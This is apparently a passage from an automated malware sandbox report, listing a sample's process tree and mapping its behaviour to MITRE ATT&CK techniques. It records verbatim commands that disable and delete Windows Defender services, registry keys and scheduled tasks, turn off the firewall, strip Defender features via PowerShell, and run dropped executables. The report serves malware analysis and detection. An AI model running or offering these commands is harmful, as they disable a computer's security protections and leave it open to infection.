  "C:\Windows\System32\cmd.exe" /c sc config WinDefend start= disabled
  2⤵
  PID:1700
- - C:\Windows\system32\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    PID:2632
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
  2⤵
  - Indicator Removal: Clear Persistence
  PID:2256
- - C:\Windows\system32\schtasks.exe
    schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
    3⤵
    PID:1216
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
  2⤵
  - Indicator Removal: Clear Persistence
  PID:1596
- - C:\Windows\system32\schtasks.exe
    schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
    3⤵
    PID:3008
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
  2⤵
  - Indicator Removal: Clear Persistence
  PID:1904
- - C:\Windows\system32\schtasks.exe
    schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
    3⤵
    PID:700
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
  2⤵
  - Indicator Removal: Clear Persistence
  PID:264
- - C:\Windows\system32\schtasks.exe
    schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
    3⤵
    PID:2204
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c rem Disable Windows Security net stop "security center" net stop sharedaccess netsh firewall set opmode mode-disable
  2⤵
  PID:1068
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /f
  2⤵
  PID:3036
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /f
    3⤵
    PID:1928
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f
  2⤵
  PID:1680
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2968
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Advanced Threat Protection" /f
  2⤵
  PID:2932
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Advanced Threat Protection" /f
    3⤵
    PID:2964
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f
  2⤵
  PID:2764
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f
    3⤵
    PID:1444
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /f
  2⤵
  PID:856
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /f
    3⤵
    PID:2836
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Get-WindowsFeature -Name Windows-Defender-GUI | Remove-WindowsFeature -Remove"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2208
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Get-WindowsFeature -Name Windows-Defender | Remove-WindowsFeature -Remove"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:752

C:\Windows\system32\taskeng.exe
taskeng.exe {1DC1D15C-0732-46AF-9B90-46DA418C6C82} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:1684
- C:\Users\Admin\AppData\Local\Temp\jiwkptio.0yj.exe
  C:\Users\Admin\AppData\Local\Temp\jiwkptio.0yj.exe
  2⤵
  - Executes dropped EXE
  PID:2476
- C:\Users\Admin\AppData\Local\Temp\jiwkptio.0yj.exe
  C:\Users\Admin\AppData\Local\Temp\jiwkptio.0yj.exe
  2⤵
  - Executes dropped EXE
  PID:2484

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-9526099351034789830-21892915-120615249371760173-1756202541-634737558-451785662"
1⤵
PID:640

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1268547592-1341422744-582552122-1990451855-5464120024319711246927235841137678888"
1⤵
PID:1652

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "10388082882124859998-884037750-1712248193-1997976246-2146767161746138892-151190836"
1⤵
PID:1564

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

Indicator Removal

T1070

Clear Persistence

T1070.009

File Deletion

T1070.004

Modify Registry